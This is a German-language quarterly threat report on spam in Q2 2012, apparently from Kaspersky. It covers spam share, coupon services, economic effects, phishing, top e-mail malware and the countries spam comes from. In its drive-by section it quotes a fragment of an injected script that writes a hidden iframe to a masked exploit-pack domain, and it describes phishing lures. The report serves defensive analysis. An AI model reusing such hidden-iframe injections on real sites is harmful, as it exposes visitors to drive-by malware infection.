Spam im zweiten Quartal 2012

Inhalt

    Das Quartal in Zahlen

    • Der Spam-Anteil im E-Mail-Traffic betrug durchschnittlich 74,3 Prozent, 2,3 Prozentpunkte weniger als im ersten Quartal 2012.
    • Nach wie vor werden die meisten unerwünschten Nachrichten aus Asien (53 %) und Lateinamerika (14 %) versendet.
    • Der Anteil von Mails mit schädlichen Anhängen sank im Vergleich zum vorhergehenden Quartal um 0,3 Prozentpunkte und betrug 3 Prozent.

    Coupons vs. Spam: Rückgang des Spam-Anteils

    Im zweiten Quartal 2012 ging der Spam-Anteil im E-Mail-Traffic weiter zurück und betrug durchschnittlich 74,3 Prozent. Das sind 2,3 Prozentpunkte weniger als im vorangegangenen Quartal.

    q2_spamreport2012_pic01

    Spam-Anteil im E-Mail-Traffic, zweites Quartal 2012

    Der zu verzeichnende Rückgang des Spam-Anteils im E-Mail-Verkehr ist zumindest teilweise eine saisonale Erscheinung. In der Sommerzeit sind viele mit Spam-Bots infizierte Computer abgeschaltet, da ihre Besitzer im Urlaub sind. Andererseits kann der verminderte Spam-Traffic vor dem Hintergrund des allgemein geringen E-Mail-Aufkommens in der Urlaubssaison darauf hinweisen, dass wir es mit einer allgemeinen und nicht nur vorübergehenden Tendenz zu tun haben.

    Vor einigen Jahren erschienen im Internet neue Werbeplattformen – Webseiten, die Anwendern kollektive Rabatte über so genannte Coupons anbieten. Hat ein Nutzer einen Coupon gekauft, so zeigt er ihn beim Kauf der Ware/Dienstleistung vor und erhält Rabatt. Coupon-Services wurden schnell auf der ganzen Welt populär: Viele Unternehmen versuchen, mit ihrer Hilfe ihren Kundenstamm zu erweitern, die Kunden ihrerseits kommen in den Genuss von Sonderangeboten.

    Das Auftauchen einer neuen Werbeplattform, deren Angebote hauptsächlich via E-Mail verbreitet werden, musste unweigerlich auch Auswirkungen auf das Spam-Aufkommen haben.

    In den Junk-Mails der westlichen Länder überwiegt bekanntermaßen der Partner-Spam. Den Löwenanteil der Partnerversendungen stellt dabei Werbung für illegale Waren oder Dienstleistungen. Allerdings gibt es auch Partner-Versendungen mit Werbung für legale Waren (wie etwa Souvenirs und Blumen) sowie Spam-Mitteilungen, die keine Verbindung zu Partnerprogrammen haben.

    Die Coupon-Services spielten im westlichen Spam eine Doppelrolle – einerseits wurde das Wort „Coupon“ selbst von den Spammern verwendet, um die Aufmerksamkeit der Anwender auf ihre Versendungen zu lenken. Andererseits hat diese Werbeplattform einen Teil der Werbung für legale Waren und Dienstleistungen, die im Spam verbreitet wurde, an sich gezogen. Das ist nicht überraschend, da es sich bei den Coupon-Diensten um legale Werbeplattformen handelt und die Werbung über diese effektiver ist als Werbung in Spam-Mails. Der Anwender fühlt sich nicht belästigt, denn er erhält Angebote, die nicht von Spamfiltern blockiert werden, sondern die Versendungen richten sich vielmehr an eine definierte Zielgruppe, die nachweislich an einem Kauf interessiert ist. Da viele Unternehmen, die ihre Waren bisher im Spam angeboten hatten, nun zu den Coupon-Diensten wechselten, ging die Zahl der Spam-Versendungen im westlichen E-Mail-Traffic etwas zurück.

    In den Ländern, in denen die Coupon-Services populär sind und der Anteil von Bestell-Spam den des Partner-Spams übersteigt, hatten die Coupons noch größere Auswirkungen auf das Spam-Aufkommen. Viele Firmen, die Spam früher als wichtigstes Werbemittel einsetzten, bevorzugen die legale Werbevariante – wenn sie nicht gar komplett auf Couponservices umgestiegen sind. So ist anzunehmen, dass in Russland Reiseunternehmen ihre Werbung nicht mehr bei Spammern bestellen, sondern sich praktisch vollständig auf Couponservices verlegt haben. Nach den Ergebnissen des zweiten Quartals 2012 betrug der Anteil von unerwünschten Nachrichten aus der Kategorie „Erholung und Reisen“ im russischen Internetsegment ungeachtet der Urlaubssaison nur etwas weniger als 1 Prozent. Gleichzeitig handelte es sich bei etwa 10 Prozent aller Angebote von russischen Coupon-Diensten um Angebote von Touristikunternehmen und Reisebüros.

    Auch die immer größer werdende Zahl derartiger Dienste bringt die Auftraggeber dazu, auf diese Art der Werbung umzusteigen, denn die harte Konkurrenz auf dem Coupon-Markt zwingt die jeweiligen Dienstleister dazu, ihren Kunden immer bessere Bedingungen anzubieten. Andererseits sehen sich die Dienstleister selbst manchmal dazu genötigt, Spammer-Dienste zwecks Eigenwerbung in Anspruch zu nehmen, um so ihre Zielgruppe zu erweitern.

    Der Rückgang des Spam-Anteils im E-Mail-Traffic kann allerdings auch mit der komplizierten Weltwirtschaftslage zusammenhängen.

    Spam und die Wirtschaftslage

    Veränderungen bei den Spam-Themen

    Der ungewöhnlich geringe Anteil des Spam-Themas „Erholung und Reisen“ im russischsprachigen Spam lässt sich nicht nur durch den Wechsel der Auftraggeber zu einer legalen Werbeplattform erklären, was zweifellos als positive Tendenz in der Welt des Internet-Marketing gewertet werden kann. Er lässt sich sicherlich auch auf die besorgniserregenden Entwicklungen der Weltwirtschaftslage zurückführen. Viele kleine und mittlere Touristikunternehmen sind bereits in der erneuten Welle der Wirtschaftskrise untergegangen, was unweigerlich dazu führt, dass weniger Werbung in Umlauf ist, unter anderem auch im Spam.

    Wir beobachten auch andere Anzeichen dafür, dass die Wirtschaftskrise auf eine andere Weise den Spam beeinflusst. So begann im Mai der Anteil des Spam-Themas „Persönliche Finanzen“ zu steigen. Im letzten Frühjahrsmonat machte diese Rubrik 23,5 Prozent des gesamten englischsprachigen Spams aus. Bereits im Juni verdreifachte sich der Anteil und erreichte 73 Prozent. Dabei stellten im Juni Angebote für illegale Verdienstmöglichkeiten einen Großteil dieser Mitteilungen. Ein ähnliches Bild bietet sich uns im deutschsprachigen Spam, denn in den letzten Monaten hatten wir es hier mit einer zunehmenden Zahl von zweifelhaften Jobangeboten zu tun. Eine ähnliche Entwicklung konnten wir bereits in den Krisenjahren 2008 und 2009 beobachten.

    Durch die mit der Krise in Europa verbundene Verunsicherung begann im Februar im russischsprachigen Spam der Anteil des Spam-Themas „Immobilien“ zu steigen (von 5,5 % auf 9,2 %). Bereits nach einem Monat betrug er über 15 Prozent des gesamten Spam-Aufkommens im russischen Internetsegment und im April fast 20 Prozent.

    Einen unerwarteten Anstieg von unerwünschten Mitteilungen des Spam-Themas „Immobilien“ beobachteten wir im russischen Internetsegment das letzte Mal in den Jahren 2008 und 2009, also während der weltweiten Finanzkrise. Zu dieser Zeit stellte sich die Konjunktur des Marktes ein wenig anders dar als heute, und der Anteil derartiger Spam-Versendungen stieg von 2 bis 3 Prozent auf 7 bis 8 Prozent.

    Der deutliche Anstieg des Anteils dieses Themas vor dem Hintergrund des rückläufigen Spam-Anteils im E-Mail-Traffic zeugt von einer bedeutenden Zunahme der Immobilienwerbung im russischen Spam. Bemerkenswert ist dabei, dass es sich bei den meisten auf diese Art zum Kauf angebotenen Objekten um Immobilien in Ländern wie Spanien handelt, die am stärksten von der derzeitigen Wirtschaftskrise betroffen sind. Das liegt daran, dass kleine Investoren versuchen, Immobilien zu verkaufen, deren Preis allen Prognosen zufolge bald fallen wird. Spam ist im russischen Internetsegment nach wie vor die günstigste Methode, für solche Objekte zu werben.

    Im zweiten Quartal 2012 tauchten im Spam bereits Mitteilungen auf, die das Thema „Krise“ ausnutzten – sowohl um auf die absolut traditionellen Partnerversendungen aufmerksam zu machen als auch, um zweifelhafte, billige Kredite zu bewerben. Zudem registrieren wir Spam-Mails in englischer und russischer Sprache, in denen die Teilnahme an Seminaren angeboten wird, die sich mit der Krise im Allgemeinen oder mit der Krise in der Eurozone im Speziellen beschäftigen.

    Schädlicher Spam

    Sollte sich Spam unter den Bedingungen der komplizierten wirtschaftlichen Situation ähnlich wie in den Jahren 2008 und 2009 entwickeln, so haben wir allen Grund zu der Befürchtung, dass der Anteil an betrügerischem und schädlichem Spam in den nächsten Monaten zunehmen wird. Mit dieser Prognose im Blick ist es sinnvoll, einige Methoden näher zu betrachten, die Cyberkriminelle zur Versendung von Schadcode einsetzen. Wir möchten darauf hinweisen, dass unter den im Folgenden beschriebenen Methoden sowohl neue als auch traditionelle, zumindest aber unter Cyberkriminellen beliebte Ansätze vertreten sind.

    Spam für Drive-by-Attacken

    Es ist bekannt, dass Schadprogramme in Spam-Mails nicht nur über schädliche Anhänge, sondern auch über schädliche Links verbreitet werden. Man muss dabei unbedingt bedenken, dass schon ein Klick auf einen solchen Link zur Infektion des Computers führen kann, ohne dass der Anwender es bemerkt (so genannte Drive-by-Attacken). Das geschieht „dank“ der Umleitung des Browsers auf Seiten mit verschiedenen Exploit-Packs.

    Im zweiten Quartal 2012 registrierten wir eine Vielzahl von Versendungen, die für Drive-by-Attacken verwendet wurden. Das allgemeine Angriffsschema erklären wir an einem konkreten Beispiel:

    1. Der Anwender erhält eine Mail, die als Benachrichtigung eines bekannten Unternehmens, als offizieller Brief, als Newsletter oder als Privatkorrespondenz getarnt ist. Darin wird er aufgefordert, auf den enthaltenen Link zu klicken. Häufig enthalten derartige Nachrichten Phrasen, die den Nutzer drängen, so schnell wie möglich auf den Link zu klicken, wie zum Beispiel „as soon as possible“ und „urgently“.

    1. Folgt der Anwender dem Link, so landet er auf einer Webseite mit integriertem, getarntem Skript. (Das Skript in der oben abgebildeten Mail wird von Kaspersky Mail Antivirus als Trojan.Script.Generic detektiert). Die Aufgabe des Skripts besteht darin, den Browser des Users mit Hilfe des Tags iframe auf eine schädliche Webseite umzuleiten.

    Hier ein Fragment des Quellcodes:

    document.write (s)  <iframe src=‘http://r*****d.su:8080/images/aublbzdni.php‚ width=’10‘ height=’10‘ style=’visibility:hidden;position:absolute;left:0;top:0;‘></iframe>

    Auf der Webseite sieht man lediglich den Text „Loading…Please Wait…“.

    1. Im Fall des obigen Texts wurde der Browser auf eine Webseite mit dem Phoenix Exploit-Pack umgeleitet. In anderen Fällen führten die Links auf das Blackhole Exploit-Pack. Nach dem Aufruf dieser schädlichen Webseiten wird der Computer des Anwenders von Exploits angegriffen, die auf Sicherheitslücken in Java, dem Flash Player oder dem Adobe Reader ausgelegt sind. Läuft es für die Cyberkriminellen günstig, verwendet der Anwender eine verwundbare Version mindestens einer der genannten Anwendungen. In diesem Fall wird eine ausführbare Datei auf den Computer geladen, die sich mit der Steuerungszentrale der Cyberkriminellen verbindet und ihrerseits verschiedene Schadprogramme auf den Rechner lädt.

    Wiki-Schädling

    Im April tauchten Spam-Versendungen auf, die als offizielle Benachrichtigungen von Facebook getarnt waren. Die wichtigste Besonderheit dieser Mitteilungen bestand darin, dass der gefälschte Link, der den Anwender auf eine schädliche oder eine Phishing-Webseite umleiten sollte, nicht auf eine erst kürzlich registrierte Domain oder eine gehackte legitime Webseite verwies, sondern auf eine eigens erstellte Seite auf Wikipedia oder Amazon. Allerdings funktionierte keiner der Links in den von uns erhaltenen Mitteilungen länger als einige Minuten nach seiner Entdeckung. Wir nahmen an, dass die Online-Gangster schädliche Skripte auf den von ihnen erstellten Wikipedia-Seiten platziert hatten, sowie – als Werbung für Second-Hand-Waren getarnt – auch auf der Webseite Amazon.com. Allerdings reagierten Facebook und Amazon schnell, denn noch während die Spam-Mitteilungen verbreitet wurden, waren die Links bereits funktionsunfähig.

    Reise-Schädlinge
    Cyberkriminelle, die schädliche Mails verbreiten, arbeiten weiterhin an der Verfeinerung ihrer Social-Engineering-Methoden. So registrierten wir im Laufe des zweiten Quartals Versendungen, in denen ganze „Touristenpakete“ angeboten wurden, die Spammer offensichtlich eigens zur Urlaubssaison zusammengestellt hatten.

    Zum einen geht es hier um gefälschte Mitteilungen von Fluggesellschaften über Online-Buchungen, wobei die Mails schädliche Links enthalten. Während wir im letzten Quartal bereits derartige Versendungen registriert hatten, die angeblich von US Airways stammten, erschienen im zweiten Quartal ähnliche Benachrichtigungen, die im Namen von British Airways verschickt wurden.

    Neben Flugbuchungen nutzten Cyberkriminelle auch das Thema Hotelbuchungen zu ihren Zwecken aus. Wir registrierten eine Versendung, die angeblich von der Webseite booking.com stammte. Die Mails, in denen der Nutzer aufgefordert wurde, eine Zimmerbuchung zu bestätigen, enthielten einen schädlichen Anhang, den Kaspersky Mail Antivirus als Trojan-Spy.Win32.Zbot erkennt.

    Die Mitteilung macht keinen allzu vertrauenswürdigen Eindruck, zudem gleicht sie bis auf das gefälschte Feld „From“ in keiner Hinsicht einer Originalmail von booking.com. Allerdings sind in der Sommersaison Buchungswebseiten äußerst populär und die Anwender sind leider nicht immer auf der Hut. So sind allem Anschein nach selbst dieser mit heißer Nadel gestrickten Fälschung viele Anwender zum Opfer gefallen.

    Wir weisen einmal mehr darauf hin, dass große Online-Dienste Buchungsbestätigungen niemals in Zip-Archiven versenden. Bestehen Zweifel an der Echtheit der Nachricht, gibt es immer die Möglichkeit, Kontakt mit dem Unternehmen aufzunehmen, etwa über dessen offizielle Webseite, auf der üblicherweise ein Kontaktformular sowie eine Telefonnummer und eine E-Mail-Adresse stehen.

    Aktuelle Spam-Themen

    Präsidenten-Spam

    Man kann behaupten, dass Barack Obama im zweiten Quartal 2012 zur beliebtesten Persönlichkeit unter Spammern avanciert ist. Wir entdeckten eine Vielzahl von Mails mit Verweisen auf den amerikanischen Präsidenten. Interessant ist, dass ein Großteil dieser Mitteilungen Kritik an neuen Gesetzesprojekten enthält, die vom Präsidenten genehmigt wurden. Die Mails waren sorgfältig gestaltet und enthielten Aufrufe zu Unterschriftenaktionen gegen Obamas Politik. Zudem wurde in den Mitteilungen darum gebeten, Geld auf die Konten verschiedener offizieller amerikanischer Organisationen zu überweisen.

    Interessanterweise fallen politischer und anderer nicht-kommerzieller Spam in den USA nicht unter den CAN-SPAM Act. Das bedeutet, dass offizielle Organisationen tatsächlich derartige Nachrichten verschicken könnten.

    Doch auch Versendungen, die unter das amerikanische Anti-Spam-Gesetz fallen und die den Namen des Präsidenten ausnutzten, waren im E-Mail-Traffic anzutreffen. Bei der Analyse von Mitteilungen mit Werbung für illegale pharmazeutische Produkte oder Uhrenimitate mit Betreffzeilen wie „Obama ertappt“ fühlte man sich unfreiwillig an ebensolche Mails erinnert, die vor fast vier Jahren in Umlauf waren. Damals, nach der Wahl Obamas zum US-Präsidenten, stieß man in nahezu jeder großen Spam-Versendung auf seinen Namen, und im Betreff hieß es häufig, „Obama gibt seine Geheimnisse preis“ oder „Obama ist eine Frau!“. Nun haben die Spammer anscheinend ihre alten Schablonen wieder ausgepackt, in der Hoffnung, die neue Welle des Interesses an Obama für sich nutzen zu können – dieses Mal aufgrund der nahenden Präsidentschaftswahlen in den USA, für die der amtierende Präsident erneut kandidiert.

    Die Präsidentschaftswahlen in Frankreich hatten auch einen gewissen Einfluss auf die thematische Zusammenstellung von Spam. Im E-Mail-Traffic fanden sich Spam-Versendungen – wenn auch nicht ganz so zahlreich –, die den Kandidaten und dem regierenden Staatsoberhaupt gewidmet waren. Wie wir bereits in unserem Aprilbericht erwähnten, traf man im französischsprachigen Spam insbesondere auf Mails mit Werbung für T-Shirts, auf denen für Nicolas Sarkozy Wahlkampf gemacht wurde. Werbung für den aktuell regierenden Präsidenten Francois Hollande war im Spam praktisch nicht vorhanden.

    Thematischer Betrug

    Die instabile Situation in Syrien lässt die „nigerianischen“ Spammer seit April nicht zur Ruhe kommen. In unserem russischen Blog haben wir bereits über Mitteilungen berichtet, die angeblich von der Ehefrau Baschar Assads stammen. Im Verlauf des gesamten Quartals registrierten wir Mitteilungen mit demselben Text. Wenn man den nigerianischen Spammern jedoch eines nicht absprechen kann, so ist das Phantasie. Daher ist auch diese Geschichte nicht auf eine Variante beschränkt. Im Spam finden sich nigerianische Mails sowohl von „Familienmitgliedern und Verwandten Assads“ als auch von einfachen syrischen Bürgern.

    Auch die Fußballeuropameisterschaft 2012 war für die Spammer ein Thema. Seit dem Winter kursieren im E-Mail Traffic auch Spam-Mails, die angeblich vom Olympischen Komitee in London stammen und in denen die Betrüger für so genannte „olympische“ Lotterien werben. Das geschah umso aktiver, je näher dieses sportliche Großereignis rückte.

    Spam-Geografie

    Spam-Herkunftsländer

    Im zweiten Quartal 2012 hat sich die Geografie der Spam-Quellen entscheidend verändert. Auf Platz eins der Spam-Herkunftsländer konnte sich völlig überraschend China positionieren, das etwa 19 Prozent des gesamten Spam-Aufkommens stellt. Zudem kehrten die USA nach langer Pause in das Führungstrio zurück und teilten sich den zweiten Platz mit Indien: Aus beiden Ländern wurde mit 11,7 Prozent exakt dieselbe Spam-Menge versendet.

    Verteilung der Spam-Quellen nach Ländern, zweites Quartal 2012

    Im letzten Quartal berichteten wir über eine Neuverteilung von Botnetzen und eine mögliche Veränderung der Spam-Geografie. Eine so drastische Verschiebung hatten wir allerdings nicht erwartet. China gehörte vor einigen Jahren schon einmal zu den Spitzenreitern im Spam-Rating, doch nach Inkrafttreten eines Gesetzes gegen Spam im Jahr 2006 ging der Junk-Mail-Anteil dieses Landes deutlich zurück. Sechs Jahre sind seitdem vergangen, und wie es scheint haben die Spammer dieses Gesetz zwischenzeitlich vergessen, da es nicht angewendet wird.

    Insgesamt ist die Rückkehr von China und den USA in die Top 20 durchaus logisch – die gute Internetverbindung und die ungeheure Menge von Anwendern, deren Computer mit Spam-Bots infiziert und zum Spamversand genutzt werden können, zieht die Cyberkriminellen unweigerlich an.

    Trotz Veränderung bei den Spam-Anteilen bleiben die Grundtendenzen unverändert: Immer mehr Spam kommt aus Asien und Lateinamerika. So stammten im zweiten Quartal 9 Länder der Top 20 aus der asiatischen Region, 5 aus Lateinamerika und nur jeweils ein Land aus Westeuropa (Großbritannien) und Osteuropa (Russland).

    Bemerkenswert ist, dass in verschiedenen Regionen Europas der Spam aus unterschiedlichen Ländern stammt. So kommt der größte Teil des Spams, der in den westeuropäischen Ländern landet, aus China. In anderen Regionen kommt Spam aus China wesentlich seltener vor, und nur aufgrund der Spam-Versendungen nach Westeuropa konnte China den ersten Platz im weltweiten Rating erreichen. Der nach Osteuropa versendete Spam stammt aus Indien und in Nordamerika werden hauptsächlich unerwünschte Nachrichten aus den USA in Umlauf gebracht.

    Verteilung der Spam-Quellen nach Regionen

    Verteilung der Spam-Quellen nach Regionen, zweites Quartal 2012

    Wie die Grafik zeigt, stammt ein großer Teil des weltweiten Spam-Aufkommens aus Ländern der asiatischen Region, die schon seit Langem führend in punkto Spam-Versand ist. Doch im zweiten Quartal 2012 stieg der aus Asien stammende Spam-Anteil noch deutlich an. Das geht in erster Linie auf das Konto Chinas, das in diesem Quartal den ersten Platz im Rating der Spam-Herkunftsländer belegt.

    Zudem nahm auch der Spam-Anteil zu, der aus Nordamerika versendet wird. Die absolute Mehrheit des Spam-Anteils aus dieser Region stammt aus den USA – ebenfalls ein ehemaliger Spitzenreiter unseres Ratings. Es sind bereits 2 Jahre vergangen, seitdem einige Steuerungszentralen großer Botnetze geschlossen wurden und die aus diesem Land versendete Spam-Menge deutlich zurückging. Nun bauen die Spammer erneut Botnetze in den USA auf, und das ist auch nur folgerichtig, denn die Zahl der Internetnutzer ist in diesem Land sehr hoch. Dementsprechend ist in den USA auch die Zahl der Computer äußerst hoch, die sich potenziell infizieren lassen.

    Verteilungsdynamik von Spam aus den einzelnen Regionen im zweiten Quartal 2012

    Was die übrigen Regionen betrifft, so lässt sich eine weitere Verringerung des Spam-Traffics aus Europa feststellen – sowohl aus dem westlichen als auch aus dem östlichen Teil des Kontinents. Lateinamerika belegt nach wie vor Position zwei im Rating der Spam-Herkunftsregionen, obwohl der aus dieser Region stammende Spam-Anteil im Vergleich zum vorhergehenden Quartal abgenommen hat.

    Schädliche Anhänge

    Im zweiten Quartal 2012 ging der durchschnittliche Anteil an E-Mails mit schädlichen Anhängen gegenüber dem vorangegangenen Quartal um 0,3 Prozentpunkte zurück und betrug damit 3 Prozent. Folgende Grafik zeigt die Verteilung dieses Wertes nach Monaten.

    q2_spamreport2012_pic13

    Anteil von Mails mit schädlichen Anhängen, zweites Quartal 2012

    Wie das Diagramm zeigt, änderte sich der Anteil an schädlichen Anhängen im elektronischen Postverkehr im Laufe des Quartals nur unwesentlich.

    Wir erinnern daran, dass ein geringer Anteil an schädlichen Anhängen im E-Mail-Traffic nicht mit einem Rückgang der schädlichen Versendungen als solche gleichzusetzen ist, da Schädlinge via E-Mail nicht ausschließlich in Form von Anhängen, sondern auch über Links auf infizierte Webseiten verbreitet werden.

     

    Verteilung der Attacken via E-Mail nach Ländern

    Im zweiten Quartal 2012 sah die Verteilung der Alarme unseres Mail Antivirus nach Ländern folgendermaßen aus:

    Verteilung der Alarme von Kaspersky Mail Antivirus nach Ländern, zweites Quartal 2012

    Insgesamt blieb das Länderrating nach Alarmen von Kaspersky Mail Antivirus im Vergleich zum vorangegangenen Quartal praktisch unverändert. Neun von zehn Ländern bleiben unserer Hitliste bereits seit einem halben Jahr treu und haben lediglich hier und da die Plätze getauscht. Die Anteile der Attacken auf die Länder aus den Top 10 waren ebenfalls nur geringen Veränderungen unterworfen. Für alle Länder bis auf die Sonderverwaltungszone Hongkong bewegten sich die Änderungen in den Grenzen von 2 Prozentpunkten.

    Hongkong war im zweiten Quartal 2012 nicht mehr in den Top 5 vertreten kam nur noch auf einen Anteil von 4,8 Prozent (minus 4 Prozentpunkte).

    Platz eins des Ratings belegen erneut die USA, die die Führungsposition im Laufe von sechs Monaten nicht einmal abgegeben haben. Verglichen mit dem vorangegangenen Quartal stieg der Anteil der Alarme von Kaspersky Mail Antivirus auf dem Territorium dieses Landes um 2 Prozentpunkte. Den zweiten und dritten Platz belegten mit Großbritannien und Deutschland  zwei westeuropäische Staaten, deren Anteile um 2 respektive 1,4 Prozentpunkte gestiegen sind.

    Top 10 der Schadprogramme im E-Mail-Traffic

    An der Spitze der am häufigsten von Kaspersky Mail Antivirus aufgespürten Schädlinge stand im zweiten Quartal 2012 erneut Trojan-Spy.HTML.Fraud.gen. Der Anteil der Detektionen dieses Programms ging gegenüber dem Vormonat um 2 Prozentpunkte zurück und betrug damit insgesamt 12,5 Prozent. Nähere Informationen zu diesem Schadprogramm finden Sie hier. Wir erinnern nur kurz daran, dass dieser Schädling von Phishern verwendet wird und als HTML-Seite daherkommt, die als Registrierungsformular einer Finanzorganisation oder irgendeines Online-Dienstes getarnt ist. Die auf einer solchen Seite eingegebenen Registrierungsdaten werden an die Cyberkriminellen gesendet.

    Top 10 der Schadprogramme im E-Mail-Traffic, zweites Quartal 2012

    In den Top 10 sind nach wie vor viele E-Mail-Würmer vertreten. Email-Worm.Win32.Mydoom.m konnte seine Position halten (2. Platz), ebenso sein Seelenverwandter Mydoom.l (9. Platz). Der letztgenannte E-Mail-Wurm erfüllt nur zwei Funktionen: Auf infizierten Rechnern sammelt er E-Mail-Adressen und verschickt sich selbst an diese. Die selbe Funktionalität besitzt der Schädling auf Position 5, Email-Worm.Win32.NetSky.q. Ein weiterer Wurm, Email-Worm.Win32.Bagle.gt (3. Platz), verbindet sich darüber hinaus noch mit Internet-Ressourcen, um von dort Schadprogramme herunterzuladen.

    Auf Position 6 befindet sich das Packprogramm Packed.Win32.Katusha.o, das im Juni Platz 2 des Ratings belegte. Packer dieser Familie sind häufig in unserem Rating vertreten. Sie werden eingesetzt, um andere Schädlinge, meist gefälschte Antiviren-Programme, vor Entdeckung durch AV-Produkte zu schützen.

    Phishing

    Im zweiten Quartal 2012 machten die Angriffe auf Nutzer sozialer Netzwerke über ein Viertel aller Versuche aus, Daten mit Hilfe von Phishing zu stehlen.

    Top 100 der am häufigsten von Phishern angegriffenen Organisationen nach Kategorien.
    Alarme des Anti-Phishing-Moduls im zweiten Quartal 2012

    Das Kategorien-Rating der von Phishern angegriffenen Organisationen wird auf der Grundlage der Alarme unserer Anti-Phishing-Komponente auf den Computern der Teilnehmer des Kaspersky Security Network (KSN) erstellt. Das Anti-Phishing-Modul erkennt alle Phishing-Links, die Anwender aufrufen, wobei die Links in einer Spam-Mitteilung oder im Internet platziert sein können. Genauere Informationen über jede Kategorie finden Sie hier.

    Die Kategorie „Soziale Netzwerke“ überholte die Kategorie „Finanzorganisationen“ nach Anzahl der durchgeführten Attacken. Die Zunahme des Anteils der Angriffe auf soziale Netzwerke hängt mit den Sommerferien zusammen. In dieser Zeit sind viele Schüler und Studenten im Internet unterwegs, die häufig auch solche Dienste nutzen. Andererseits verfügt diese Zielgruppe selten über Zugangsdaten zum Online-Banking. Auch insgesamt geht die Finanzaktivität im Sommer zurück, was wiederum zu einer Abnahme des gegen Finanzorganisationen gerichteten Angriffe führt. Diese sind für Cyberkriminelle allerdings am einträglichsten, daher bleibt ihr Anteil – wenn auch verringert – auf sehr hohem Niveau.

    Fazit

    Der Spam-Anteil im E-Mail-Traffic nimmt weiter ab. Diese Entwicklung hängt mit verschiedenen Faktoren zusammen, die das Spam-Business beeinflussen: saisonbedingte (zur Urlaubszeit sind viele mit Spam-Bots infizierte Rechner abgeschaltet), ökonomische (auch die mit einer möglichen Wirtschaftskrise zusammenhängende Stimmungslage hat Auswirkungen auf die Spam-Menge) und wettbewerbsbedingte (einige Auftraggeber wenden sich von den Spammern ab und nehmen die Dienste von Coupon-Services in Anspruch). Sollte die derzeitige wirtschaftliche Situation unverändert bleiben oder sich gar verschärfen,  prognostizieren wir, dass sich der Spam-Anteil  weiter verringern wird, insbesondere noch bis zum Ende der Urlaubssaison. Wir schließen zudem die Möglichkeit einer schrittweisen Abnahme des Spam-Anteils bis zu einem Wert von 65 Prozent im Laufe des nächsten Jahres nicht aus.

    Die Geografie der Spam-Quellen hat sich stark verändert. Die an guten Internetverbindungen und einer hohen Zahl von Nutzern interessierten Cybergangster haben die Kapazitäten ihrer Botnetze in China und den USA wiederhergestellt, von wo aus zum gegenwärtigen Zeitpunkt am meisten Spam versendet wird. Obwohl wir Veränderungen in der Verteilung der Spam-Quellen vorhergesagt hatten, haben wir nicht damit gerechnet, dass sie so bald eintreten würden. Andererseits setzt sich der Trend zu mehr Spam aus Asien und Lateinamerika fort.

    Nicht zufällig haben wir einige Methoden zur Verbreitung von Schadcode im Spam genauer beschrieben. Die diesbezüglichen Erfahrungen in den Krisenjahren 2008 und 2009 haben uns gelehrt, dass ein deutlicher Anstieg von Schadcode im E-Mail-Traffic praktisch garantiert ist. Daher wird Spam bedeutend gefährlicher. Dabei möchten wir eindringlich darauf hinweisen, dass sich das Arsenal der Cyberkriminellen in den letzten Jahren immer mehr erweitert hat und fast jeden Monat neue Social-Engineering-Methoden hinzugekommen sind.

    Ähnliche Beiträge

    Schreibe einen Kommentar

    Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.